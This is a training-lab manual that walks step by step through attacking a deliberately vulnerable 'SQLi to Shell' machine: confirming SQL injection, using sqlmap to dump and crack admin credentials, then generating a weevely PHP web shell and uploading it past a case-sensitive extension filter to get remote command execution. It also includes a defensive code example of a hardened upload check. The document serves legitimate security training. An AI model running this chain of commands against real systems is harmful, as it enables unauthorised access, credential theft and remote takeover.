Lab Manual - SQLi To Shell - V1.0
SQLi to Shell
Steps to follow:
Step 1. We shall start by finding out the IP address of the SQLi to Shell machine. Go to the SQLi to Shell terminal, type ifconfig and press Enter. It will display the IP address as shown in the image below.
Step 2. Go to the browser, enter the IP address of the SQLi to Shell machine and press Enter. The target website will open as shown in the image below.
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 3. A new page will open in the browser with the URL 192.168.43.129/cat.php?id=1, as shown in the image below.
Step 4. Now, append a single quote (') to the URL and press Enter. An SQL syntax error should appear on the page, which means the website is vulnerable to SQL injection.
Step 5. Now, copy the URL of this page and open a new terminal. Type sqlmap -u target_URL, as shown in the image below, and press Enter.
Step 6. sqlmap will now start scanning the target. As shown in the image below, it identifies the back-end DBMS as MySQL and asks whether to skip the tests specific to other DBMSes. Type n to choose No.
Step 7. It will then ask whether to include all tests for MySQL. Type n to choose No.
Step 8. As shown in the image below, it finds that the parameter id is vulnerable and asks whether to keep testing the others. Type n to choose No.
Step 9. Now, to find out the database names, type sqlmap -u target_URL --dbs, as shown in the image below, and press Enter.
Step 10. As shown in the image below, it has found 2 databases. Now we shall try to retrieve the tables of the database 'photoblog'.
Step 11. To find out the names of the tables within the database, type sqlmap -u target_URL -D photoblog --tables, as shown in the image below, and press Enter.
Step 12. As shown in the image below, sqlmap has found 3 tables. Now we shall try to retrieve the columns of the table users.
Step 13. To retrieve the columns of users, type sqlmap -u target_URL -D photoblog -T users --columns, as shown in the image below, and press Enter.
Step 14. As shown in the image below, sqlmap has found 3 columns, namely id, login and password. Now we shall dump the data of these columns.
Step 15. To dump the data of these columns, type sqlmap -u target_URL -D photoblog -T users -C id,login,password --dump, as shown in the image below, and press Enter.
Step 16. sqlmap will now ask whether to store the hashes to a file. Type n to choose No.
Step 17. Now, sqlmap will ask whether to crack the hashes via a dictionary-based attack. Type y to choose Yes.
Step 18. Now, sqlmap will ask whether to use the default dictionary, a custom dictionary, or a file containing a list of dictionary files. Type 1 and press Enter.
Step 19. sqlmap will now ask whether to use common password suffixes. Type n and press Enter.
Step 20. As highlighted in the image below, sqlmap has recovered a username and password.
Step 21. Now, go to the login page of the website and log in with these credentials.
Step 22. You will be greeted with the administrator page, as shown in the image below. Click on New picture.
Step 23. A new page will now appear as shown in the image below. On this page we can upload a PHP web shell, but before uploading it we first need to create one.
Step 24. To create a web shell, open a new terminal and type weevely generate password filename, as shown in the image below, and press Enter.
Step 25. Now go to the upload page and upload this web shell.
Step 26. As shown in the image below, the page responds with "NO PHP!!!". This means no file with the extension ".php" is allowed.
Step 27. To change the name of the file, type mv filename newfilename, as shown in the image below.
Step 28. Now, go back to the upload page and upload this shell.
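The "NO PHP!!!" refusal above only rejects the exact lower-case extension, which is why a renamed file gets past it. The following Python is an added example, not code from the lab or from the target application, contrasting that kind of denylist with an allowlist check; the image-only policy, the extension set and the magic-byte table are assumptions about what such a picture upload form should accept.

```python
import os
import re
import secrets

# Assumption: the upload form is for pictures only, so only image types are accepted.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the accepted formats (constructed table; "jpeg" shares the "jpg" entry).
ALLOWED_MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def weak_is_allowed(filename: str) -> bool:
    """Denylist of the kind the 'NO PHP!!!' message suggests: only the exact
    lower-case '.php' suffix is refused, so a mixed-case name such as 'evil.pHp' passes."""
    return not filename.endswith(".php")


def hardened_is_allowed(filename: str, content: bytes) -> bool:
    """Allowlist: plain base name, exactly one extension, compared case-insensitively,
    and the file's leading bytes must match the type the extension claims."""
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return False  # path components or dotfiles such as .htaccess
    parts = base.split(".")
    if len(parts) != 2 or not NAME_RE.fullmatch(parts[0]):
        return False  # double extensions like 'shell.php.jpg' and odd characters stop here
    ext = parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    for magic, kind in ALLOWED_MAGIC.items():
        if content.startswith(magic):
            return kind == ext or (kind == "jpg" and ext == "jpeg")
    return False  # not a recognised image, whatever the name says


def stored_name(ext: str) -> str:
    """Server-chosen file name: the uploader never controls the path the file
    is later served from, so the URL cannot be derived from the uploaded name."""
    return f"{secrets.token_hex(16)}.{ext.lower()}"


if __name__ == "__main__":
    # Constructed samples: a PHP payload with a mixed-case extension, and a real JPEG header.
    print(weak_is_allowed("evil.pHp"))                                # True: bypassed
    print(hardened_is_allowed("evil.pHp", b"<?php echo 1; ?>"))       # False
    print(hardened_is_allowed("holiday.JPG", b"\xff\xd8\xff\xe0abc"))  # True
```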
Step 29. As shown in the image below, the web shell has been uploaded.
Step 30. Here, we can see that the uploaded web shell is listed. Now, click on evil.pHp.
Step 31. A new blank page will open. Note the URL of this page.
Step 32. To get the reverse connection, copy the whole URL, open a new terminal and type weevely copied_URL password, as shown in the image below:
As can be seen in the image above, we are connected to the weevely shell and can now execute arbitrary commands remotely.
Note: There are other ways to find out the URL or path of the web shell, such as Burp Suite, dirb, gobuster, etc. Please practice those as part of the exercise.